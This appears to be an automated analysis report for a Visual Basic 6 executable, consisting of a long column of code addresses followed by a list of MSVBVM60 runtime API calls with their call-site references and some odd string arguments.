0x0041d521
0x0041d506
0x0041d506
0x0041d50b
0x0041d510
0x0041d515
0x0041d515
0x0041d545
0x0041d549
0x0041d54e
0x0041d566
0x0041d569
0x0041d56b
0x0041d578
0x0041d59a
0x0041d57a
0x0041d57a
0x0041d57c
0x0041d581
0x0041d587
0x0041d58d
0x0041d592
0x0041d592
0x0041d5a1
0x0041d5a3
0x0041d5a5
0x0041d5a7
0x0041d5ac
0x0041d5af
0x0041d5b4
0x0041d5be
0x0041d5c6
0x0041d5ce
0x0041d5d3
0x0041d5e1
0x0041d5fe
0x0041d5e3
0x0041d5e3
0x0041d5e8
0x0041d5ed
0x0041d5f2
0x0041d5f2
0x0041d622
0x0041d626
0x0041d62b
0x0041d643
0x0041d649
0x0041d64b
0x0041d658
0x0041d67d
0x0041d65a
0x0041d65a
0x0041d65f
0x0041d664
0x0041d66a
0x0041d670
0x0041d675
0x0041d675
0x0041d684
0x0041d687
0x0041d68a
0x0041d68b
0x0041d690
0x0041d691
0x0041d696
0x0041d699
0x0041d69a
0x0041d69f
0x0041d6a0
0x0041d6a5
0x0041d6ab
0x0041d6c1
0x0041d6cb
0x0041d6cf
0x0041d6d3
0x0041d6d4
0x0041d6d6
0x0041d6db
0x0041d6e1
0x0041d6ef
0x0041d6f5
0x0041d703
0x0041d720
0x0041d705
0x0041d705
0x0041d70a
0x0041d70f
0x0041d714
0x0041d714
0x0041d744
0x0041d748
0x0041d74d
0x0041d765
0x0041d768
0x0041d76a
0x0041d777
0x0041d799
0x0041d779
0x0041d779
0x0041d77b
0x0041d780
0x0041d786
0x0041d78c
0x0041d791
0x0041d791
0x0041d7a7
0x0041d7c4
0x0041d7a9
0x0041d7a9
0x0041d7ae
0x0041d7b3
0x0041d7b8
0x0041d7b8
0x0041d7e8
0x0041d7ec
0x0041d7f1
0x0041d809
0x0041d80f
0x0041d811
0x0041d81e
0x0041d843
0x0041d820
0x0041d820
0x0041d825
0x0041d82a
0x0041d830
0x0041d836
0x0041d83b
0x0041d83b
0x0041d84a
0x0041d84d
0x0041d850
0x0041d85a
0x0041d862
0x0041d866
0x0041d867
0x0041d869
0x0041d874
0x0041d878
0x0041d879
0x0041d87b
0x0041d883
0x0041d88d
0x0041d88e
0x0041d891
0x0041d896
0x0041d89b
0x0041d89b
0x0041d89e
0x0041d8ac
0x0041d8c9
0x0041d8ae
0x0041d8ae
0x0041d8b3
0x0041d8b8
0x0041d8bd
0x0041d8bd
0x0041d8ed
0x0041d8f1
0x0041d8f6
0x0041d90e
0x0041d914
0x0041d916
0x0041d923
0x0041d948
0x0041d925
0x0041d925
0x0041d92a
0x0041d92f
0x0041d935
0x0041d93b
0x0041d940
0x0041d940
0x0041d956
0x0041d973
0x0041d958
0x0041d958
0x0041d95d
0x0041d962
0x0041d967
0x0041d967
0x0041d997
0x0041d99b
0x0041d9a0
0x0041d9b8
0x0041d9be
0x0041d9c0
0x0041d9cd
0x0041d9f2
0x0041d9cf
0x0041d9cf
0x0041d9d4
0x0041d9d9
0x0041d9df
0x0041d9e5
0x0041d9ea
0x0041d9ea
0x0041d9f9
0x0041d9fb
0x0041d9fd
0x0041da00
0x0041da06
0x0041da07
0x0041da0f
0x0041da10
0x0041da15
0x0041da16
0x0041da19
0x0041da1c
0x0041da1d
0x0041da22
0x0041da23
0x0041da28
0x0041da2e
0x0041da44
0x0041da4e
0x0041da52
0x0041da53
0x0041da55
0x0041da60
0x0041da64
0x0041da68
0x0041da69
0x0041da6b
0x0041da70
0x0041da79
0x0041da87
0x0041da8d
0x0041da9b
0x0041dab8
0x0041da9d
0x0041da9d
0x0041daa2
0x0041daa7
0x0041daac
0x0041daac
0x0041dadc
0x0041dae0
0x0041dae5
0x0041dafd
0x0041db00
0x0041db02
0x0041db0f
0x0041db31
0x0041db11
0x0041db11
0x0041db13
0x0041db18
0x0041db1e
0x0041db24
0x0041db29
0x0041db29
0x0041db3b
0x0041db41
0x0041db4b
0x0041db51
0x0041db5b
0x0041db5d
0x0041db68
0x0041db6f
0x0041db70
0x0041db7b
0x0041db82
0x0041db83
0x0041db8e
0x0041db92
0x0041db93
0x0041db9b
0x0041dba6
0x0041dbad
0x0041dbae
0x0041dbb0
0x0041dbb5
0x0041dbb8
0x0041dbbf
0x0041dbc1
0x0041dbc1
0x0041da87
0x0041dbc6
0x0041dbcd
0x0041dbd2
0x0041dbd7
0x0041dbe5
0x0041dc02
0x0041dbe7
0x0041dbe7
0x0041dbec
0x0041dbf1
0x0041dbf6
0x0041dbf6
0x0041dc26
0x0041dc2a
0x0041dc2f
0x0041dc4a
0x0041dc50
0x0041dc52
0x0041dc5f
0x0041dc84
0x0041dc61
0x0041dc61
0x0041dc66
0x0041dc6b
0x0041dc71
0x0041dc77
0x0041dc7c
0x0041dc7c
0x0041dc92
0x0041dcaf
0x0041dc94
0x0041dc94
0x0041dc99
0x0041dc9e
0x0041dca3
0x0041dca3
0x0041dcd3
0x0041dcd7
0x0041dcdc
0x0041dcf7
0x0041dcfd
0x0041dcff
0x0041dd0c
0x0041dd31
0x0041dd0e
0x0041dd0e
0x0041dd13
0x0041dd18
0x0041dd1e
0x0041dd24
0x0041dd29
0x0041dd29
0x0041dd3f
0x0041dd5c
0x0041dd41
0x0041dd41
0x0041dd46
0x0041dd4b
0x0041dd50
0x0041dd50
0x0041dd80
0x0041dd84
0x0041dd89
0x0041dda4
0x0041ddaa
0x0041ddac
0x0041ddb9
0x0041ddde
0x0041ddbb
0x0041ddbb
0x0041ddc0
0x0041ddc5
0x0041ddcb
0x0041ddd1
0x0041ddd6
0x0041ddd6
0x0041ddec
0x0041ddfa
0x0041de01
0x0041de12
0x0041de19
0x0041de4d
0x0041de56
0x0041de5a
0x0041de5e
0x0041de5f
0x0041de61
0x0041de69
0x0041de77
0x0041de94
0x0041de79
0x0041de79
0x0041de7e
0x0041de83
0x0041de88
0x0041de88
0x0041deb8
0x0041debc
0x0041dec1
0x0041dedc
0x0041dee2
0x0041dee4
0x0041def1
0x0041df16
0x0041def3
0x0041def3
0x0041def8
0x0041defd
0x0041df03
0x0041df09
0x0041df0e
0x0041df0e
0x0041df1d
0x0041df3c
0x0041df45
0x0041df4a
0x0041df59
0x0041df5e
0x0041df80
0x0041df86
0x0041df93
0x0041dfb5
0x0041df95
0x0041df95
0x0041df9a
0x0041df9f
0x0041dfa2
0x0041dfa8
0x0041dfad
0x0041dfad
0x0041dfbf
0x0041dfc4
0x0041dfd2
0x0041dfef
0x0041dfd4
0x0041dfd4
0x0041dfd9
0x0041dfde
0x0041dfe3
0x0041dfe3
0x0041e013
0x0041e017
0x0041e01c
0x0041e037
0x0041e03a
0x0041e03c
0x0041e049
0x0041e06b
0x0041e04b
0x0041e04b
0x0041e04d
0x0041e052
0x0041e058
0x0041e05e
0x0041e063
0x0041e063
0x0041e079
0x0041e096
0x0041e07b
0x0041e07b
0x0041e080
0x0041e085
0x0041e08a
0x0041e08a
0x0041e0ba
0x0041e0be
0x0041e0c3
0x0041e0db
0x0041e0e1
0x0041e0e3
0x0041e0f0
0x0041e115
0x0041e0f2
0x0041e0f2
0x0041e0f7
0x0041e0fc
0x0041e102
0x0041e108
0x0041e10d
0x0041e10d
0x0041e123
0x0041e140
0x0041e125
0x0041e125
0x0041e12a
0x0041e12f
0x0041e134
0x0041e134
0x0041e164
0x0041e168
0x0041e16d
0x0041e188
0x0041e18e
0x0041e190
0x0041e19d
0x0041e1c2
0x0041e19f
0x0041e19f
0x0041e1a4
0x0041e1a9
0x0041e1af
0x0041e1b5
0x0041e1ba
0x0041e1ba
0x0041e1cf
0x0041e1f4
0x0041e201
0x0041e208
0x0041e21b
0x0041e223
0x0041e239
0x0041e23f
0x0041e24c
0x0041e26e
0x0041e24e
0x0041e24e
0x0041e253
0x0041e258
0x0041e25b
0x0041e261
0x0041e266
0x0041e266
0x0041e27b
0x0041e27e
0x0041e28c
0x0041e2a9
0x0041e28e
0x0041e28e
0x0041e293
0x0041e298
0x0041e29d
0x0041e29d
0x0041e2cd
0x0041e2d1
0x0041e2d6
0x0041e2ee
0x0041e2f1
0x0041e2f3
0x0041e300
0x0041e322
0x0041e302
0x0041e302
0x0041e304
0x0041e309
0x0041e30f
0x0041e315
0x0041e31a
0x0041e31a
0x0041e330
0x0041e34d
0x0041e332
0x0041e332
0x0041e337
0x0041e33c
0x0041e341
0x0041e341
0x0041e371
0x0041e375
0x0041e37a
0x0041e395
0x0041e39b
0x0041e39d
0x0041e3aa
0x0041e3cf
0x0041e3ac
0x0041e3ac
0x0041e3b1
0x0041e3b6
0x0041e3bc
0x0041e3c2
0x0041e3c7
0x0041e3c7
0x0041e3dd
0x0041e3e7
0x0041e3ed
0x0041e3fa
0x0041e3ff
0x0041e431
0x0041e43a
0x0041e440
0x0041e44d
0x0041e455
0x0041e45d
0x0041e461
0x0041e462
0x0041e464
0x0041e46c
0x0041e47a
0x0041e497
0x0041e47c
0x0041e47c
0x0041e481
0x0041e486
0x0041e48b
0x0041e48b
0x0041e4bb
0x0041e4bf
0x0041e4c4
0x0041e4dc
0x0041e4e2
0x0041e4e4
0x0041e4f1
0x0041e516
0x0041e4f3
0x0041e4f3
0x0041e4f8
0x0041e4fd
0x0041e503
0x0041e509
0x0041e50e
0x0041e50e
0x0041e51d
0x0041e51f
0x0041e521
0x0041e52a
0x0041e52b
0x0041e53a
0x0041e557
0x0041e53c
0x0041e53c
0x0041e541
0x0041e546
0x0041e54b
0x0041e54b
0x0041e57b
0x0041e57f
0x0041e584
0x0041e59c
0x0041e5a2
0x0041e5a4
0x0041e5b1
0x0041e5d6
0x0041e5b3
0x0041e5b3
0x0041e5b8
0x0041e5bd
0x0041e5c3
0x0041e5c9
0x0041e5ce
0x0041e5ce
0x0041e5e4
0x0041e601
0x0041e5e6
0x0041e5e6
0x0041e5eb
0x0041e5f0
0x0041e5f5
0x0041e5f5
0x0041e625
0x0041e62c
0x0041e631
0x0041e64c
0x0041e652
0x0041e654
0x0041e661
0x0041e686
0x0041e663
0x0041e663
0x0041e668
0x0041e66d
0x0041e673
0x0041e679
0x0041e67e
0x0041e67e
0x0041e690
0x0041e696
0x0041e6a3
0x0041e6af
0x0041e6b9
0x0041e6dd
0x0041e6e6
0x0041e6ec
0x0041e6f9
0x0041e701
0x0041e705
0x0041e706
0x0041e708
0x0041e713
0x0041e71a
0x0041e71e
0x0041e722
0x0041e723
0x0041e725
0x0041e733
0x0041e738
0x0041e746
0x0041e763
0x0041e748
0x0041e748
0x0041e74d
0x0041e752
0x0041e757
0x0041e757
0x0041e787
0x0041e78b
0x0041e790
0x0041e7ab
0x0041e7b1
0x0041e7b3
0x0041e7c0
0x0041e7e5
0x0041e7c2
0x0041e7c2
0x0041e7c7
0x0041e7cc
0x0041e7d2
0x0041e7d8
0x0041e7dd
0x0041e7dd
0x0041e7f3
0x0041e810
0x0041e7f5
0x0041e7f5
0x0041e7fa
0x0041e7ff
0x0041e804
0x0041e804
0x0041e834
0x0041e838
0x0041e83d
0x0041e858
0x0041e85e
0x0041e860
0x0041e86d
0x0041e892
0x0041e86f
0x0041e86f
0x0041e874
0x0041e879
0x0041e87f
0x0041e885
0x0041e88a
0x0041e88a
0x0041e8a0
0x0041e8ad
0x0041e8d5
0x0041e8db
0x0041e8e8
0x0041e90a
0x0041e8ea
0x0041e8ea
0x0041e8ef
0x0041e8f4
0x0041e8f7
0x0041e8fd
0x0041e902
0x0041e902
0x0041e917
0x0041e91d
0x0041e921
0x0041e922
0x0041e924
0x0041e92c
0x0041e93a
0x0041e957
0x0041e93c
0x0041e93c
0x0041e941
0x0041e946
0x0041e94b
0x0041e94b
0x0041e97b
0x0041e97f
0x0041e984
0x0041e99f
0x0041e9a5
0x0041e9a7
0x0041e9b4
0x0041e9d9
0x0041e9b6
0x0041e9b6
0x0041e9bb
0x0041e9c0
0x0041e9c6
0x0041e9cc
0x0041e9d1
0x0041e9d1
0x0041e9e7
0x0041ea04
0x0041e9e9
0x0041e9e9
0x0041e9ee
0x0041e9f3
0x0041e9f8
0x0041e9f8
0x0041ea28
0x0041ea2c
0x0041ea31
0x0041ea49
0x0041ea4f
0x0041ea51
0x0041ea5e
0x0041ea83
0x0041ea60
0x0041ea60
0x0041ea65
0x0041ea6a
0x0041ea70
0x0041ea76
0x0041ea7b
0x0041ea7b
0x0041ea8a
0x0041ea8c
0x0041ea8e
0x0041ea97
0x0041ea98
0x0041eaa7
0x0041eac4
0x0041eaa9
0x0041eaa9
0x0041eaae
0x0041eab3
0x0041eab8
0x0041eab8
0x0041eae8
0x0041eaef
0x0041eaf4
0x0041eb0f
0x0041eb15
0x0041eb17
0x0041eb24
0x0041eb49
0x0041eb26
0x0041eb26
0x0041eb2b
0x0041eb30
0x0041eb36
0x0041eb3c
0x0041eb41
0x0041eb41
0x0041eb57
0x0041eb74
0x0041eb59
0x0041eb59
0x0041eb5e
0x0041eb63
0x0041eb68
0x0041eb68
0x0041eb98
0x0041eb9f
0x0041eba4
0x0041ebbf
0x0041ebc5
0x0041ebc7
0x0041ebd4
0x0041ebf9
0x0041ebd6
0x0041ebd6
0x0041ebdb
0x0041ebe0
0x0041ebe6
0x0041ebec
0x0041ebf1
0x0041ebf1
0x0041ec07
0x0041ec14
0x0041ec27
0x0041ec2e
0x0041ec48
0x0041ec51
0x0041ec58
0x0041ec5f
0x0041ec63
0x0041ec67
0x0041ec68
0x0041ec6a
0x0041ec78
0x0041ec7d
0x0041ec8b
0x0041eca8
0x0041ec8d
0x0041ec8d
0x0041ec92
0x0041ec97
0x0041ec9c
0x0041ec9c
0x0041eccc
0x0041ecd0
0x0041ecd5
0x0041eced
0x0041ecf3
0x0041ecf5
0x0041ed02
0x0041ed27
0x0041ed04
0x0041ed04
0x0041ed09
0x0041ed0e
0x0041ed14
0x0041ed1a
0x0041ed1f
0x0041ed1f
0x0041ed3c
0x0041ed4c
0x0041ed51
0x0041ed5a
0x0041ed74
0x0041ed7b
0x0041ed85
0x0041eda6
0x0041edb3
0x0041edba
0x0041edbe
0x0041edbf
0x0041edc1
0x0041edcc
0x0041edd0
0x0041edd1
0x0041edd3
0x0041ede1
0x0041ede6
0x0041edf4
0x0041ee11
0x0041edf6
0x0041edf6
0x0041edfb
0x0041ee00
0x0041ee05
0x0041ee05
0x0041ee35
0x0041ee39
0x0041ee3e
0x0041ee59
0x0041ee5f
0x0041ee61
0x0041ee6e
0x0041ee93
0x0041ee70
0x0041ee70
0x0041ee75
0x0041ee7a
0x0041ee80
0x0041ee86
0x0041ee8b
0x0041ee8b
0x0041eea1
0x0041eeb0
0x0041eebd
0x0041eee8
0x0041eeee
0x0041eefb
0x0041ef1d
0x0041eefd
0x0041eefd
0x0041ef02
0x0041ef07
0x0041ef0a
0x0041ef10
0x0041ef15
0x0041ef15
0x0041ef2e
0x0041ef39
0x0041ef3e
0x0041ef54
0x0041ef5a
0x0041ef67
0x0041ef89
0x0041ef69
0x0041ef69
0x0041ef6e
0x0041ef73
0x0041ef76
0x0041ef7c
0x0041ef81
0x0041ef81
0x0041ef96
0x0041ef9b
0x0041efa2
0x0041f011
0x0041f019
0x0041f021
0x0041f029
0x0041f031
0x0041f032
0x0041f034
0x0041f039
0x0041f03c
0x0041f03d
0x0041f03f
0x0041f047
0x0041f04f
0x0041f057
0x0041f05c

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041D1C2
#692.MSVBVM60(?,Unecliptic9,Bovlamme1,?,?,?,?,00401356), ref: 0041D217
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041D23E
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041D250
__vbaNew2.MSVBVM60(00403C68,004223FC,00008008,?), ref: 0041D27E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 0041D2E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000108), ref: 0041D33F
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,00000108), ref: 0041D361
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D380
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D3B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000158), ref: 0041D403
#618.MSVBVM60(?,00000087), ref: 0041D41F
__vbaStrMove.MSVBVM60(?,00000087), ref: 0041D429
__vbaFreeStr.MSVBVM60(?,00000087), ref: 0041D431
__vbaFreeObj.MSVBVM60(?,00000087), ref: 0041D439
#711.MSVBVM60(?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D470
__vbaAryVar.MSVBVM60(00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D481
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D497
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D4AC
__vbaSetSystemError.MSVBVM60(?,?,00401356), ref: 0041D4C6
#517.MSVBVM60(phrontisterium), ref: 0041D4E7
__vbaStrMove.MSVBVM60(phrontisterium), ref: 0041D4F1
__vbaNew2.MSVBVM60(00403270,00422010,phrontisterium), ref: 0041D510
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D549
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000048), ref: 0041D58D
#712.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D5B4
__vbaStrMove.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D5BE
__vbaFreeStr.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D5C6
__vbaFreeObj.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D5CE
__vbaNew2.MSVBVM60(00403270,00422010,STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D5ED
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D626
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000000A0), ref: 0041D670
__vbaStrToAnsi.MSVBVM60(?,?), ref: 0041D68B
__vbaStrToAnsi.MSVBVM60(?,Tvivlsomst9,00000000,?,?), ref: 0041D69A
__vbaSetSystemError.MSVBVM60(00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D6AB
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D6D6
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041D6E1
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,00401356), ref: 0041D70F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D748
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000050), ref: 0041D78C
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D7B3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D7EC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000170), ref: 0041D836
__vbaStrCat.MSVBVM60(?,?), ref: 0041D850
__vbaStrMove.MSVBVM60(?,?), ref: 0041D85A
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?), ref: 0041D869
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D87B
__vbaPrintObj.MSVBVM60(00403D48,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D896
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,00401356), ref: 0041D8B8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D8F1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000110), ref: 0041D93B
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D962
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D99B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000100), ref: 0041D9E5
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041DA07
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041DA10
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041DA1D
__vbaSetSystemError.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041DA2E
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041DA55
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,00000000,00000000), ref: 0041DA6B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 0041DA79
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,00000000,00000000), ref: 0041DAA7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DAE0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000048), ref: 0041DB24
#717.MSVBVM60(?,00000008,00000080,00000000), ref: 0041DB70
__vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000), ref: 0041DB83
__vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041DB93
__vbaFreeObj.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041DB9B
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000), ref: 0041DBB0
__vbaOnError.MSVBVM60(000000FF), ref: 0041DBC1
__vbaSetSystemError.MSVBVM60(000000FF), ref: 0041DBD2
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DBF1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DC2A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001E8), ref: 0041DC77
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DC9E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DCD7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001F0), ref: 0041DD24
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DD4B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DD84
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000000E0), ref: 0041DDD1
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DE61
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,00401356), ref: 0041DE83
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DEBC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000120), ref: 0041DF09
__vbaFreeObj.MSVBVM60 ref: 0041DF45
__vbaStrCopy.MSVBVM60 ref: 0041DF59
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040391C,000006F8), ref: 0041DFA8
__vbaFreeStr.MSVBVM60(00000000,?,0040391C,000006F8), ref: 0041DFBF
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DFDE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E017
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C88,00000060), ref: 0041E05E
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E085
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E0BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000110), ref: 0041E108
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E12F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E168
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000120), ref: 0041E1B5
__vbaFreeStr.MSVBVM60 ref: 0041E208
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041E21B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040391C,000006FC), ref: 0041E261
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E298
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E2D1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CF4,00000048), ref: 0041E315
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E33C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E375
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000000F8), ref: 0041E3C2
__vbaStrMove.MSVBVM60(00000000,?,00403C88,000000F8), ref: 0041E3FA
__vbaStrMove.MSVBVM60 ref: 0041E44D
__vbaFreeStr.MSVBVM60 ref: 0041E455
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E464
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041E486
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E4BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000130), ref: 0041E509
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E52B
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E546
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E57F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001E0), ref: 0041E5C9
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E5F0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E62C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000140), ref: 0041E679
__vbaStrMove.MSVBVM60(00000000,?,00403CF4,00000140), ref: 0041E6A3
__vbaStrVarMove.MSVBVM60(?), ref: 0041E6AF
__vbaStrMove.MSVBVM60(?), ref: 0041E6B9
__vbaStrMove.MSVBVM60 ref: 0041E6F9
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041E708
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041E725
__vbaFreeVar.MSVBVM60 ref: 0041E733
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E752
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E78B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000120), ref: 0041E7D8
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E7FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E838
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000140), ref: 0041E885
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040391C,00000700), ref: 0041E8FD
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E924
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E946
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E97F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000180), ref: 0041E9CC
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E9F3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EA2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000160), ref: 0041EA76
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EA98
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041EAB3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EAEF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000108), ref: 0041EB3C
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041EB63
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EB9F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000000D8), ref: 0041EBEC
__vbaI4Var.MSVBVM60(?,?,?), ref: 0041EC2E
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041EC6A
__vbaFreeVar.MSVBVM60 ref: 0041EC78
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041EC97
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041ECD0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000130), ref: 0041ED1A
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041ED3C
__vbaStrCopy.MSVBVM60 ref: 0041ED4C
__vbaStrVarMove.MSVBVM60(?,00006FEE,?,?), ref: 0041ED7B
__vbaStrMove.MSVBVM60(?,00006FEE,?,?), ref: 0041ED85
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EDC1
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041EDD3
__vbaFreeVar.MSVBVM60 ref: 0041EDE1
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041EE00
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EE39
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,000000F8), ref: 0041EE86
__vbaStrCopy.MSVBVM60(00000000,?,00403CF4,000000F8), ref: 0041EEB0
__vbaStrCopy.MSVBVM60(00000000,?,00403CF4,000000F8), ref: 0041EEBD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040391C,00000704), ref: 0041EF10
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EF2E
__vbaFreeObj.MSVBVM60 ref: 0041EF39
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040391C,00000708), ref: 0041EF7C
__vbaFreeVar.MSVBVM60(00000000,?,0040391C,00000708), ref: 0041EF96
__vbaFreeStr.MSVBVM60(0041F05D), ref: 0041F011
__vbaFreeStr.MSVBVM60(0041F05D), ref: 0041F019
__vbaFreeStr.MSVBVM60(0041F05D), ref: 0041F021
__vbaFreeStr.MSVBVM60(0041F05D), ref: 0041F029
__vbaAryDestruct.MSVBVM60(00000000,?,0041F05D), ref: 0041F034
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,0041F05D), ref: 0041F03F
